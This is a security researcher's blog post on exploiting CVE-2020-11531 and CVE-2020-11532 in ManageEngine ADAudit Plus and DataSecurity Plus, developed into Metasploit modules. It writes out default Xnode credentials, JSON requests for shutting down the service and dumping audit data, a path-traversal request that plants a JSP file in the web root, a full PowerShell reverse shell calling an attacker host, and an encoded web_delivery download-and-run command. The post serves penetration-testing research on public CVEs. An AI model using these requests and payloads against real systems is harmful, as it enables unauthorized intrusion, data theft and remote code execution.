Pwning ManageEngine — From PoC to Exploit

A deep dive into CVE-2020–11531 and CVE-2020–11532

Erik Wynter
21 min readJun 28, 2022

Introduction

A little over two years ago, Sahil Dhar of xen1thLabs published two files on Packet Storm detailing two vulnerabilities affecting ManageEngine DataSecurity Plus and ManageEngine ADAudit Plus:

  • CVE-2020–11531 — A path traversal vulnerability that can lead to remote code execution (CSV3 base score: 8.8) — Packetstorm ID: 157604
  • CVE-2020–11532 — An authentication bypass vulnerability (CSV3 base score: 9.8) — Packetstorm ID: 157609

After coming across a vulnerable ManageEngine ADAudit instance during a penetration test last year, I decided to look into these issues and try to turn the provided PoCs into fully functional exploits. This article details my research, and shows how I eventually managed to achieve my goal.

First things first: what are ADAudit Plus and DataSecurity Plus

ManageEngine ADAudit Plus is an IT auditing solution that allows users to monitor their Active Directory environment, file servers, Windows servers and Windows workstations in order to identify suspicious activity such as unusual logons, account lockouts, and changes to users, files, groups, security policies and more. DataSecurity Plus is designed for file server auditing with the aim of providing visibility while protecting sensitive data and preventing leaks.

1. CVE-2020–11532 — From default Xnode credentials to (limited) Active Directory enumeration

1.0 Authenticating to Xnode

The description of CVE-2020–11532 as an authentication bypass is rather misleading, because the actual issue here is simply the presence of default credentials. These do not affect the web UI, but the DataEngine Xnode server that is part of ADAudit Plus and DataSecurity Plus. The PoC on Packet Storm shows that you can use these credentials to authenticate to the Xnode server and subsequently execute commands. In order to do this, you need the following information:

The default credentials:

  • username: atom
  • password: chegan

The default Xnode ports:

  • ADAudit Plus: 29118/tcp
  • DataSecurity Plus: 29119/tcp

The Xnode server uses a simple TCP socket and communicates in JSON, so you can establish a connection to Xnode via netcat or a similar tool.

The PoC shows a successful authentication request, followed by an admin:/health status request. The server responses are printed right below the requests:

#~ nc 192.168.56.108 29119
{"username":"atom","password":"chegan","request_timeout":10,"action":"session:/authenticate"}
{"response":{"status":"authentication_success"},"request_id":-1}
{"action":"admin:/health","de_health":true, "request_id":1}
{"response":{"de_health":"GREEN"},"request_id":1}

1.1 Searching for available Xnode actions

There is little documentation available on the Xnode server and I was unable to find anything about the commands, or actions rather, that it supports. In order to find out more, I spun up a Windows Server 2019 VM and installed the latest version of ADAudit Plus on it, together with Wireshark. I then configured Wireshark to listen on the loopback interface with a display filter for the Xnode port, and began interacting with the ADAudit plus web app. This way, I was able to intercept Xnode authentication and health status requests like the ones from the PoC, as well as a few additional actions such as the admin:/xnode_indo action (details on this one are provided later on). However, none of these were particularly interesting, so I decided to switch strategies.

1.2 Exploring the directory structure

I began inspecting the file structure of the ADAudit Plus installation directory, and soon found that anything Xnode related was stored at

<install_dir>\apps\dataengine-xnode

Information on the most relevant files is provided below. It should be noted that these results were virtually the same for DataSecurity Plus, since both apps seem to leverage the same Xnode codebase.

1.2.1 <install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf

This is the main Xnode configuration file, which includes settings for the Xnode port, username and password. On a vulnerable instance, it will look something like this:

xnode.connector.port = 29118
xnode.connector.username = atom
xnode.connector.password = chegan
xnode.connector.tcp.json_decode_size_mb = 20
xnode.db.store.dbname = store
xnode.db.store.dbadapter = hsqldb
xnode.db.store.username =
xnode.db.store.password =
xnode.dr.archive.zip_password =

1.2.2 <install_dir>\apps\dataengine-xnode\conf\datarepository\datarepositories.conf

Configuration for the enabled Xnode data repositories, which are basically database tables. Example:

[AdapFileAuditLog]
repository_name = AdapFileAuditLog
repository_state = ENABLED
repository_type = audit-log
description = File audit
container_name = audit-log
is_legacy = true
legacy_table_name = AUDFileAuditInfo
schema_name = AdapFileAuditLog_V1
store_raw_data = true
contains_duplicate = false
block_prefix = adapFileAuditLog
block_main_hot_count = 1
block_main_hot_refresh_interval = 1
block_main_hot_rotation_type = SIZE
block_main_hot_rotation_size = 3000000
block_main_hot_rotation_period =
block_main_retention_days = -1
block_frozen_retention_days = 1500
block_defrost_retention_days = 10
xnodes = localhost

1.2.3 <install_dir>\apps\dataengine-xnode\conf\datarepository\schema\

Directory containing JSON files that match the schema_name values for each data repository in datarepositories.conf, but with the .json file extension added to it. Each JSON file contains information on the fields, which are basically database columns, for the respective data repository. The below snippet shows the top of the AdapFileAuditLog_V1.json file, which corresponds to the AdapFileAuditLog datarepository.

{"mappings": {
"range_field": "TIME_GENERATED", "unique_fields": [ "TIME_GENERATED", "RECORD_NUMBER" ],
"default_analyzer": "KEYWORD_LOWERCASE",
"field_list": [
{"UNIQUE_ID": {
"docs_val": true,
"type": "long"
}},
{"MONITOR_ID": {
"docs_val": true,
"type": "long"
}},
{"EVENT_NUMBER": {
"docs_val": true,
"type": "integer"
}},
{"TIME_GENERATED": {
"docs_val": true,
"type": "long"
}},
[snipped]

1.2.4 <install_dir>\apps\dataengine-xnode\lib\

This directory contains a dozen or so jar files, at least three of which contain code relating to the Xnode server:

  • dataengine-commons.jar
  • dataengine-controller.jar
  • dataengine-xnode.jar

1.3 Searching inside JAR files with WinRAR

JAR stands for Java ARchive, and JAR files are indeed just archives. I’m not afraid to admit that I did not actually know this going in, since I had no real experience with Java, let alone Java code review. Another thing I learned, from one underappreciated answer to a question on StackOverflow, is that searching JAR files for strings can be very easily accomplished on Windows by using WinRAR (yes, really). So I downloaded WinRAR, took advantage of its world famous free trial, and began running search queries from

<install_dir>\apps\dataengine-xnode\lib\

My aim was to find the class defining the supported Xnode server actions, so my search terms contained the names of the Xnode actions I already knew to be supported:

Right away, I got some promising results. When investigating those, I soon found the hidden treasure in the dataengine-xnode.jar file at

com.manageengine.dataengine.xnode.connector.global.actionhandlers

There I found two classes that defined everything I wanted to know:

  • AdminRequestHandler.class
  • DataRepositoryRequestHandler.class

1.4 Digging into the JAR files

The next step was to open the JAR files in JD-GUI. I initially wasn’t familiar with this tool, but a quick search on the interwebs had told me that it is a great app for decompiling JAR files and the interwebs did not lie, because JD-GUI is fantastic.

1.4.1 AdminRequestHandler.class

This class lists the Xnode actions of the admin type. It contains a processRequest function, which mentions the actions in a bunch of if statements, each of which returns the function that will process the action:

public TransportResponse processRequest(TransportRequest request) throws Exception {
if (request.actionType().startsWith("admin:/health"))
return processHealthRequest(request);
if (request.actionType().startsWith("admin:/xnode_info"))
return processXNodeInfoRequest(request);
if (request.actionType().startsWith("admin:/update_security_settings"))
return processUpdateSecuritySettingsRequest(request);
if (request.actionType().startsWith("admin:/shutdown"))
return processShutdownRequest(request);
return TransportResponse.buildErrorResponse(request, 1, "Requested ADMIN operation not supported!");
}

By reading the source code of the defining functions I was able to build valid requests for these actions, which helped me figure out what each action does:

  • admin:/health — Xnode health status check:
{"action":"admin:/health","de_health":true, "request_id":1}
{"response":{"de_health":"GREEN"},"request_id":1}
  • admin:/xnode_info — Obtain the Xnode version and installation path:
{"action":"admin:/xnode_info","request_id":2}
{"response":{"xnode_installation_path":"C:\\Program Files (x86)\\ManageEngine\\ADAudit Plus\\apps\\dataengine-xnode","xnode_version":"XNODE_1_0_0"},"request_id":2}
  • admin:/shutdown — Shutdown the Xnode server (the server will not send a response). This could be used for DoS purposes:
{“action”:”admin:/shutdown”,”request_id”:2}
  • admin:/update_security_settings — Set the Xnode password for zip archives. The provided password will be stored in encrypted format in dataengine-xnode.conf as the value for the xnode.dr.archive.zip_password setting. Example:
{"action":"admin:/update_security_settings","archive_zip_pwd":"hunter2", "request_id":1}
{"response":{"error_code":0},"request_id":1}

After this, dataengine-xnode.conf will contain the encrypted password:

xnode.dr.archive.zip_password=0fb4820622fa139faba387f67b77a00d2af91b368cfdb267b29cb5c7b419aa44b0a0535a

I did not look into the type of encryption used here, since I had other plans.

1.5 DataRepositoryRequestHandler.class

This class also contains a processRequest function that reveals a whopping 18 additional actions in another hideous list of if statements:

public TransportResponse processRequest(TransportRequest request) throws Exception {
if (request.actionType().startsWith("dr:/dr_data_add"))
return processDataAddRequest(request);
if (request.actionType().startsWith("dr:/dr_migration_data_add"))
return processMigrationDataAddRequest(request);
if (request.actionType().startsWith("dr:/dr_migration_data_validate"))
return processMigrationDataValidateRequest(request);
if (request.actionType().startsWith("dr:/dr_data_update"))
return processDataUpdateRequest(request);
if (request.actionType().startsWith("dr:/dr_data_delete"))
return processDataDeleteRequest(request);
if (request.actionType().startsWith("dr:/dr_search"))
return processSearchRequest(request);
if (request.actionType().startsWith("dr:/dr_sync"))
return processDRSync(request);
if (request.actionType().startsWith("dr:/dr_update"))
return processDRUpdate(request);
if (request.actionType().startsWith("dr:/dr_main_blocks_disk_size_fetch"))
return processDRMainBlocksDiskSizeFetch(request);
if (request.actionType().startsWith("dr:/dr_main_blocks_disk_size_older_than_fetch"))
return processDRMainBlocksDiskSizeOlderThanFetch(request);
if (request.actionType().startsWith("dr:/dr_schema_sync"))
return processDRSchemaSync(request);
if (request.actionType().startsWith("dr:/dr_blocks_meta_sync"))
return processDRBlocksMetaSync(request);
if (request.actionType().startsWith("dr:/dr_blocks_meta_fetch"))
return processDRBlocksMetaFetch(request);
if (request.actionType().startsWith("dr:/dr_blocks_count_fetch"))
return processDRBlocksCountFetch(request);
if (request.actionType().startsWith("dr:/dr_archive_old_blocks"))
return processDRArchiveOldBlocks(request);
if (request.actionType().startsWith("dr:/dr_archive_blocks_load"))
return processArchiveBlocksLoad(request);
if (request.actionType().startsWith("dr:/dr_archive_blocks_unload"))
return processArchiveBlocksUnload(request);
if (request.actionType().startsWith("dr:/dr_archive_locations_sync"))
return processDRArchiveLocationsSync(request);
return TransportResponse.buildErrorResponse(request, 1, "Requested DR Action not supported!");
}

Well, well, well, if it isn’t the freaking jackpot.

Based on the name alone, I figured that dr:/dr_search is where it’s at in terms of enumeration. However, several other actions are worth mentioning as well. They are discussed in the next section, categorized by their impact.

1.6 Xnode data repository actions and their impact:

1.6 A) Manipulate stored data

1.6 A1) View and manipulate HSQLDB data blocks

I’m starting with this category because it provides a convenient point to discuss what Xnode data repositories actually are. Previously, I mentioned only that they resemble databases, and that data repository “fields” are like the columns making up a data repository. The true story is more complicated, and honestly still somewhat eludes me, but it should go something like this:

  • ADAuditPlus and DataSecurity Plus are each shipped with a PostgreSQL database that will be populated with the data the applications gather when monitoring file servers, Windows servers and Windows workstations.
  • Both projects also come with an HSQLDB (HyperSQL DataBase) for the Xnode server. This database stores “blocks” of data for each data repository.
  • The data repositories and their fields correspond with PostgreSQL database tables and their columns. I verified this by actually connecting to the PostgreSQL database for my ADAudit Plus instance.
  • Putting this together, I imagine that certain data in the PostgreSQL database, namely the audit data from the tables that correspond with data repositories, is periodically packed into blocks and copied over to the HSQLDB. Then whenever this data is requested by a user or an automated process, the Xnode server retrieves it from the HSQLDB.
  • Based on the source code, it seems that directly accessible datablocks are labeled “hot”, while archived ones are “frozen”. Archived blocks can be accessed after being “defrosted”.

The ADAudit Plus release notes for April 2019, when the DataEngine Xnode server was added, mention:

Faster search and retrieval of file audit data with ADAudit Plus’s all new DataEngine

So the reason behind this design seems to be that retrieving audit data from the HSQLDB via Xnode is faster than querying the PostgreSQL database for every search query or data retrieval request.

Again, this may not be a 100% correct description of how it works, but it should be close enough to make sense of the Xnode actions in this category:

  • dr_blocks_meta_fetch — Obtain the meta information of blocks for specific datarepositories:
{"dr_name_list":["AdapFileAuditLog"], "action":"dr:/dr_blocks_meta_fetch","request_id":1}
{"response":{"dr_blocks_meta":[{"creation_time":1627865990666,"block_name":"adapFileAuditLog_1627865990666","doc_count":0,"size":0,"range_from":0,"datarepository_name":"AdapFileAuditLog","state":"HOT","raw_size":0,"is_merged":false,"version":10,"status":"-","range_to":0}]},"request_id":1}
  • dr:/dr_archive_old_blocks — Archive (“freeze”) blocks older than the maximum retention period specified for a specific data repository in datarepositories.conf
  • dr:/dr_archive_blocks_load — Defrost archived blocks
  • dr:/dr_archive_blocks_unload — Refreeze defrosted blocks

1.6 A2) Edit datarespositiries.conf

  • dr:/dr_synch — Overwrite all data in datarepositories.conf
  • dr:/dr_update — Modify some or all of the data in datarepositories.conf

1.6 A3 Edit the datarepository schema files

  • dr:/dr_schema_sync — Write JSON files containing datarepository schema information to the <install_dir>\apps\dataengine-xnode\conf\datarepository\schema\ directory

1.6 B) Manipulate stored data

  • dr:/dr_data_add — Add data to the Xnode datarepositories
  • dr:/dr_data_update — Edit data in the Xnode datarepositories
  • dr:/dr_data_delete** — Delete data from the Xnode datarepositories

1.6 C) Retrieve data from the datarepositories

  • dr:/dr_search — Retrieve data from the data repositories based on provided parameters

1.7 Looking into dr:/dr_search

As I previously hinted, the dr:/dr_search action was exactly what I needed to enumerate the data repositories. In this section I provide an overview of relevant classes and functions that process this action, and how I used this information to build a series of valid search queries to enumerate everything there was to enumerate.

1.7.1 processSearchRequest

As the below code snippet shows, the processSearchRequest function, which processes dr:/dr_search action requests, passes the received Xnode action request to the `build` function of a class called SearchRequest. The object it receives back is then passed to the executeSearch method of the SearchService class, and returned to the calling function (processRequest).

private TransportResponse processSearchRequest(TransportRequest request) throws Exception {
LOGGER.info("SEARCH REQUEST received :: " + request.getRequest());
SearchRequest searchRequest = SearchRequest.build(request);
SearchService sService = new SearchService();
return sService.executeSearch(searchRequest);
}

1.7.2 SearchRequest.build

The qualified name of the SearchRequest class is

package com.manageengine.adap.dataengine.xnode.datarepository.search.SearchRequest

The first few lines of its build function specify two mandatory parameters: query and dr_name_list:

public static SearchRequest build(TransportRequest request) throws Exception {
SearchRequest searchRequest = new SearchRequest(request.requestId(), request.actionType());
if (!request.has("query") ||
!request.has("dr_name_list"))
throw new Exception("Error while processing search-request, missing some mandatory request parameters(query|dr_name_list)");
searchRequest.query(request.getString("query"));
  • dr_name_list — This parameter should consist of a JSON array containing the name(s) of one or multiple data repositories as listed in datarepositories.conf.
  • query — This parameter should consist of a JSON string containing SQL-like statements where columns and values are separated by a colon. An example is shown below:
"query":"EVENT_TYPE:4 AND (EVENT_MACHINE_DOMAIN:ECORP OR EVENT_MACHINE_DOMAIN:ecorp.local)"

1.8 Blindly dumping data from the data repositories

In an attempt to retrieve all data from the existing data repositories, I first wrote a single query consisting of:

  • A specification of the dr_search action: "action":"dr:/dr_search"
  • The dr_name_list parameter mapped to an array of data repository names, eg:
”dr_name_list”:[“AdapFileAuditLog”, “AdapPowershellAuditLog”]
  • The query parameter mapped to a string containing the TIME_GENERATED column, with its value set to a range between two Unix Epoch timestamps, eg:
”query”:”TIME_GENERATED:[1595851364 TO 2627369199]”

It should be noted that no sanity check is performed on the lower and upper timestamp values, so to ensure that all data will be returned, you can set the lower timestamp all the way back to 1970 and the upper one to a date in the future.

  • (Automated Xnode server requests always include the request_id parameter, which is mapped to an integer value, eg: "request_id":1. However, this parameter is not required.)

Throwing this all together, my very basic search request to dump all data looked something like this:

{“dr_name_list”:[“AdapFileAuditLog”,”AdapPowershellAuditLog”],”query”:” TIME_GENERATED:[1595851364 TO 2627369199]”,”action”:”dr:/dr_search”,”request_id”:1}

However, I discovered that this request has at least four major shortcomings:

  1. If one of data repositories in `dr_name_list` doesn’t actually exist on the target, Xnode will throw an error.
  2. Xnode will return each database record (ie row) as a JSON array containing the values for that record, so without the field (column) names. This means that you can never be fully sure which field a specific value belongs to.
  3. Xnode will remove trailing values from the response if they are null. This is annoying if you are trying to parse the response and expect the number of values returned for a record to match the number of fields for that data repository.
  4. The default maximum number of records (eg database rows) that Xnode will return is 10.

1.9 Precision dumping

1.9.1 Overcoming problem 1: one at a time, please

The first issue 1 is very easily overcome by querying all data repositories that may exist on the target one by one. For ADAudit Plus, there are only two data repositories that may exist on a vulnerable host:

  • AdapFileAuditLog — Present in all vulnerable versions (builds 6000–6032). This is the only data repository that corresponds with a differently named table in the PostgreSQL database (AUDFileAuditInfo instead of AdapFileAuditLog)
  • AdapPowershellAuditLog — Present in some vulnerable versions (builds 6030–6032).

For DataSecurity Plus, there are too many possible data repositories to list here.

An example search query for a single data repository is shown below, together with the partial server response:

{“dr_name_list”:[“AdapPowershellAuditLog”],”query”:” TIME_GENERATED:[1595851364 TO 2627369199]”,”action”:”dr:/dr_search”,”request_id”:1}{“response”:{“search_after”:”doc=9 score=1.0 shardIndex=0",”total_hits”:87,”search_result”:[[“601”,null,null,null,null,”ECORP-DC.ecorp.local”,”ecorp.local”,null,”4104",”16",null,null,”6408ff47-e568–447e-9c4a-0ba2688e1ab5",”554",null,”& C:\\Windows\\TEMP\\SDIAG_e90ece72–963b-44ea-ac0d-3b75d418b6d1\\TS_WERQueue.ps1<br>”,”1",null,”1638969202",”Administrator”,”S-1–5–21–865699249–1322998900–1895168254–500",”1",”129",null,null,null],[snipped]

1.9.2 Overcoming problem 2 and 3: specifying fields

In order to know for sure what column a specific value in the Xnode response belongs to, you can specify fields to query via the select_fields parameter. The value for this should be a JSON array containing field names. If you do this, Xnode will always return the value for that field, so trailing null values will no longer be dropped from the response. Moreover, if a specified field doesn’t actually exist, Xnode will simply return a null value for the non-existent field. A full query would then look something like this:

{“dr_name_list”:[“AdapFileAuditLog”],”query”:” TIME_GENERATED:[1595851364 TO 2627369199]”,”select_fields”:[“CALLER_USER_DOMAIN”,”CALLER_USER_NAME”],”action”:”dr:/dr_search”,”request_id”:1}

1.9.3 Overcoming problem 4: unique_id, min, max and total_hits

In order to find a solution for the problem of Xnode returning only up to 10 records per query, I wasted quite some time on a fruitless search through the source code for the function defining this behavior, or a parameter allowing me to increase the number of returned records per query. Eventually I chose to pursue a different approach instead, namely that of enumerating through all available records in batches of 10. Fortunately, the way to achieve this wasn’t too hard to figure out.

While inspecting various data repositories on ADAudit Plus and DataSecurity Plus, I noticed that all the interesting ones contained a UNIQUE_ID field, which I hoped would allow me to prevent requesting the same record multiple times when enumerating Xnode. After some trial and error, I confirmed that this was possible, namely by specifying the range of UNIQUE_ID values to request using the query param like this:

"query":"UNIQUE_ID:[1 TO 10]"

By simply increasing the min and max value of UNIQUE_ID, enumeration is possible, as the two example queries below show:

{"dr_name_list":["AdapPowershellAuditLog"],"query":"UNIQUE_ID:[1 TO 10]","select_fields":["UNIQUE_ID"],"action":"dr:/dr_search","request_id":1}
{"response":{"search_after":"doc=9 score=1.0 shardIndex=0","total_hits":10,"search_result":[["1"],["2"],["3"],["4"],["5"],["6"],["7"],["8"],["9"],["10"]],"index_count":1},"request_id":1}
{"dr_name_list":["AdapPowershellAuditLog"],"query":"UNIQUE_ID:[11 TO 20]","select_fields":["UNIQUE_ID"],"action":"dr:/dr_search","request_id":1}
{"response":{"search_after":"doc=19 score=1.0 shardIndex=0","total_hits":10,"search_result":[["11"],["12"],["13"],["14"],["15"],["16"],["17"],["18"],["19"],["20"]],"index_count":1},"request_id":1}

The first query requests the UNIQUE_ID values for all records with UNIQUE_ID values between 1 and 10, while the second requests the same but for records with UNIQUE_ID values between 11 and 20. In both cases, the Xnode response contains the expected UNIQUE_ID values.

Of course, if I was going to numerate over a potentially massive number of records in batches of 10, I figured it would be nice to have a way to narrow down the range of possible values for UNIQUE_ID. I found the answer to this in the following code snippet from the SearchRequest.build function, which reveals a parameter is called aggr that supports several sub-parameters including mix and max.

    if (request.has("aggr")) {
JSONObject jAggr = request.getJSONObject("aggr");
if (jAggr.length() > 0) {
String aggrKey = jAggr.keys().next();
if (aggrKey.equals("min")) {
buildMinAggregation(searchRequest, jAggr);
} else if (aggrKey.equals("max")) {
buildMaxAggregation(searchRequest, jAggr);
} else if (aggrKey.equals("sum")) {
buildSumAggregation(searchRequest, jAggr);
[snipped]

As the names imply, min and max can be used to request the record(s) with the lowest or the highest value for a certain field, respectively. If that field is specified as UNIQUE_ID, it is possible to obtain the full range of UNIQUE_ID values for all existing records, so you know from what UNIQUE_ID value to start enumerating and also when you’ve reached the last record.

Example of an aggr min request:

{"dr_name_list":["AdapPowershellAuditLog"],"query":" TIME_GENERATED:[1000000000 TO 2627369199]","aggr":{"min":{"field":"UNIQUE_ID"}},"action":"dr:/dr_search","request_id":1}
{"response":{"total_hits":0,"search_result":[],"aggr_result":{"min":"1.0"},"index_count":0},"request_id":1}

Example of an aggr max request:

{"dr_name_list":["AdapPowershellAuditLog"],"query":" TIME_GENERATED:[1000000000 TO 2627369199]","aggr":{"max":{"field":"UNIQUE_ID"}},"action":"dr:/dr_search","request_id":1}
{"response":{"total_hits":0,"search_result":[],"aggr_result":{"max":"1232.0"},"index_count":0},"request_id":1}

So in this example, the existing UNIQUE_ID values range from 1 to 1,232.

Finally, every Xnode response to a search query includes a total_hits parameter. If a request for all possible records is sent, total_hits will reveal the total number of records in the database (even though it will return only up to 10 records).

1.9.4 From PoC to MSF module

Now that I knew how to use Xnode to enumerate over all possible data repositories and all records in those data repositories, I decided to automate the process by writing two auxiliary modules for the Metasploit framework, one for ADAudit Plus, and one for DataSecurity Plus. Because both modules required a lot of the same code for the Xnode server, I decided to add an Xnode mixin as part of this effort that could be leveraged both both modules. The PR is available HERE.

The below video shows a successful run of the ADAudit Plus module against my test system. The module follows these steps:

  • Attempt to authenticate to Xnode using default (or user-specified) credentials. (In the demo video I specify the password because the target app is not actually vulnerable to CVE-2020–11532. If the app you are targeting is vulnerable, the attack will work the same way, except that you won’t have to set the password).
  • Send an admin:/health status request
  • Send an admin:/xnode_info request to obtain the Xnode version and installation path
  • Send a single dr:/dr_search request for each possible data repository to verify if it exists on the target and, if so, obtain the total number of records
  • If a data repository exists, two additional dr:/dr_search requests are sent. The first uses aggr min to obtain the lowest UNIQUE_ID value for the data repository. Predictably, the second request uses aggr max to obtain the highest UNIQUE_ID value.
  • For each existing, non-empty data repository, the module uses the obtained lowest and highest UNIQUE_ID values to request all existing records in a series of dr:/dr_search requests. These requests include specific field names so that the values returned by Xnode for each record can be mapped to their corresponding field (column) name. The field names to specify are obtained from a configuration file for each module, which can be edited by users to their needs.
  • Finally, the parsed results for the data repositories are saved to JSON files in
~/.msf4/loot/

1.10 Video || GTFO

1.11 Obtaining archived data (untested)

I am not fully sure whether or not the dr:/dr_search command will also retrieve archived data, eg data from “frozen” data blocks in the HSQLDB, but it would make sense if it doesn’t. In that case, it might be possible to obtain archived data like this:

  • use dr:/dr_blocks_meta_fetch to first get the names of all existing blocks, including “frozen” ones
  • Pass the names of the frozen blocks in a query to dr:/dr_archive_blocks_load in order to unfreeze them,
  • Run my module to enumerate all records via dr:/dr_search

2. CVE-2020–11531 — From PoC to Meterpreter

2.1 The dangerous action: dr:/dr_schema_sync

As Sahil’s PoC outlines, this vulnerability is a directory traversal issue originating in the function that handles the dr:/dr_schema_sync action. As discussed previously, the dr:/dr_schema_sync action can be used to update the data repository (database) schema information that is stored in several JSON files in

<install_dir>\apps\dataengine-xnode\conf\datarepository\schema\

A valid dr:/dr_schema_sync request should contain the dr_schema_list parameter. The value for this parameter is a hash, which has as its keys the names of the data repository schema files, and as its values, the contents of those JSON files. For each schema filename, Xnode will create a file with the specified contents. Any files that are already present in the schema directory, regardless their name, will be wiped in the process.

A legitimate dr:/dr_schema_sync request will be super long, so the below example is heavily snipped:

{"dr_schema_list":{"AdapPowershellAuditLog_V1.json":{"mappings":{"range_field":"TIME_GENERATED","unique_fields":["TIME_GENERATED","RECORD_NUMBER"],"default_analyzer":"KEYWORD_LOWERCASE","field_list":[{"UNIQUE_ID":{"docs_val":true,"type":"long"}},{"COMMAND_NAME":{"docs_val":true,"type":"text"}},{"COMMAND_PATH":{"docs_val":true,"type":"text"}},{"COMMAND_TYPE":{"docs_val":true,"type":"text"}},{"COMMAND_INVOCATION":{"docs_val":true,"type":"text"}},{"EVENT_MACHINE_NAME":{"docs_val":true,"type":"text"}},{"EVENT_MACHINE_DOMAIN":{"docs_val":true,"alias_name":"DOMAIN","type":"text"}},

{more stuff},
{a lot more stuff},
{like really a lot more stuff},

"action":"dr:/dr_schema_sync","request_id":2}

2.2 The vulnerable function: syncDRSchemas

The dr:/dr_schema_sync action is processed by the processDRSchemaSync function, which then calls syncDRSchemas in DataRepositoryManager.class to actually delete the existing files in the schema directory, and create new file(s). This class can be found in dataengine-xnode.jar at

com.manageengine.dataengine.xnode.datarepository.DataRepositoryManager

The full function is shown below:

public static JSONObject syncDRSchemas(DataRepositoryActionRequest request) throws Exception {
JSONObject jResponse = new JSONObject();
JSONObject jSchemas = request.drSchemaListObj();
File schemasFolder = ((Path)Environment.XNODE_DR_SCHEMA_DIR.value()).toFile();
schemaMap = new ConcurrentHashMap<>();
if (!schemasFolder.exists())
schemasFolder.mkdirs();
if (schemasFolder.isDirectory()) {
File[] schemaFileList = schemasFolder.listFiles();
for (File schemaFile : schemaFileList)
schemaFile.delete();
}
Iterator<String> iterator = jSchemas.keys();
while (iterator.hasNext()) {
String key = iterator.next();
BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(Environment.XNODE_DR_SCHEMA_DIR.value() + File.separator + key)));
bw.write(jSchemas.getJSONObject(key).toString(2));
bw.close();
XNodeDRSchema xNodeDRSchema = new XNodeDRSchema(key.replace(".json", ""), jSchemas.getJSONObject(key));
schemaMap.put(xNodeDRSchema.getSchemaName(), xNodeDRSchema);
LOGGER.info("SYNCHED : DataRepository Schema '" + key + "'");
}
checkFieldWithMultipleDataTypes();
jResponse.put("error_code", 0);
return jResponse;
}

In the top half of the function (roughly), syncDRSchemas checks if the schema folder exists and if it is actually a directory. If so, it will check which files are present in that directory (if any), and delete them one by one.

In the bottom half, syncDRSchemas iterates over the provided filenames. For each name, it will create a file with that name and write the provided contents to it.

As the PoC points out, the problem is that this function does not validate the provided filenames. As a result, filenames can include directory traversal sequences like ..\, making it possible to write a file to directories other than schema, such as the DataSecurity Plus web root at

<install_dir>\webapps\fap\

In addition, any file extension is allowed, including JSP.

In order to write a file named poc.jsp to the web root, dr:/dr_schema_sync request should match the following format:

{"action":"dr:/dr_schema_sync","request_id":1,"dr_schema_list":{"../../../../../webapps/fap/poc.jsp":{"randomkeyname":"myevilpayload"}}}

The Xnode server will respond with the following error:

{"response":{"error_msg":"org.json.JSONException: mappings key not found in ../../../../../webapps/fap/poc.jsp template!","error_code":1},"request_id":1}

But you can ignore this because by now,

<install_dir>\webapps\fap\poc.jsp 

should exist with the following contents:

{"randomkeyname": "myevilpayload"}

2.3 Payload limitations

In order to weaponize this, myevilpayload should be replaced with valid Java code wrapped in JSP scriptlet tags like this:

"<% System.out.println(1337); %>"

The full request then looks like this:

{"action":"dr:/dr_schema_sync","request_id":1,"dr_schema_list":{"../../../../../webapps/fap/poc.jsp":{"wynter":"<% System.out.println(1337); %>"}}}

The contents of poc.jsp will be:

{"wynter":"<% System.out.println(1337); %>"}

If you load this page in your browser by navigating to

http://<ip of datasecurity plus>:8800/poc.jsp

the page will show only the following:

{"wynter":""}

This is because the Java print statement is being executed, but it won’t actually be displayed on the page.

Unfortunately, a simple exploit levering Runtime.getRuntime().exec (payload) will not work with standard payloads. This is because the files created in response to a dr:/dr_schema_sync request can only contain valid JSON and if the provided file contents aren’t in this format, they will be converted to it. This means that special characters such as quotes will be automatically escaped, rendering typical payloads unusable.

2.4 Bytes bytes baby

The PoC contains a very neat trick to overcome this issue. In order to avoid having to deal with special characters at all, the exec call contains new String(new byte[] so that the payload can be delivered as a byte array that will then be converted to a string before being passed to the exec call:

2.5 More payload limitations

However, the story doesn’t end here, for I found that this approach doesn’t seem to like complex (and therefore larger) payloads, like those produced by msfvenom.

The payload used in the PoC consists of a simple PowerShell call that takes a base64 encoded command:

payload = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc "%s"' % (b64encode(r_cmd.encode('utf-8'))).decode('utf-8')

The command itself is a typical PowerShell reverse shell leveraging System.Net.Sockets.TCPClient:

cmd = "$client = New-Object System.Net.Sockets.TCPClient('"+lhost+"',"+str(lport)+");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendb yte.Length);$stream.Flush()};$client.Close()"

That’s neat and all, but in order to turn this exploit into a Metasploit module, which was my goal at this point, I needed something native involving at least a minimal degree of randomization rather than a single, hard-coded command.

In several of my previous Metasploit modules, I have overcome similar issues by taking advantage of the Msf::Exploit::CmdStager mixin, which allows for payloads to be delivered in batches. This works by starting a server on the attacker machine and then leveraging a command injection vector to trigger callbacks to the server in order to download the final payload. This approach may involve the command injection vector being exploited multiple times in quick succession, which is usually fine. Except this time I didn’t have a simple command injection vector. When I nevertheless tried this approach, it ended up just creating a ton of JSP files on the target (because each dr:/dr_schema_sync request writes a file to disk), before ultimately presenting me with that one line of msfconsole output that haunts the dreams of pentesters and security researchers alike:

[*] Exploit completed, but no session was created.

It was clear I had to come up with something else.

2.6 When in doubt, steal code

I knew that what I needed, was basically a simple one-liner that could get me a shell, ideally of the Meterpreter variety, in one go. I reflected on this quite a bit, and ultimately had my “Eureka!” moment when I remembered msf’s web_delivery module. This module can be found at exploit/multi/script/web_delivery in msfconsole, and provides exactly the functionality I needed because it allows you to get a fully functional msf session (Meterpreter or otherwise) by executing a single command on a target. If you run it with he PSH target for Windows, you will get something like this:

msf6 exploit(multi/script/web_delivery) > run -j
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.128:443
[*] Using URL: http://192.168.1.128:8080/qYsJe4qUvvEXgI
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUA
[snipped]

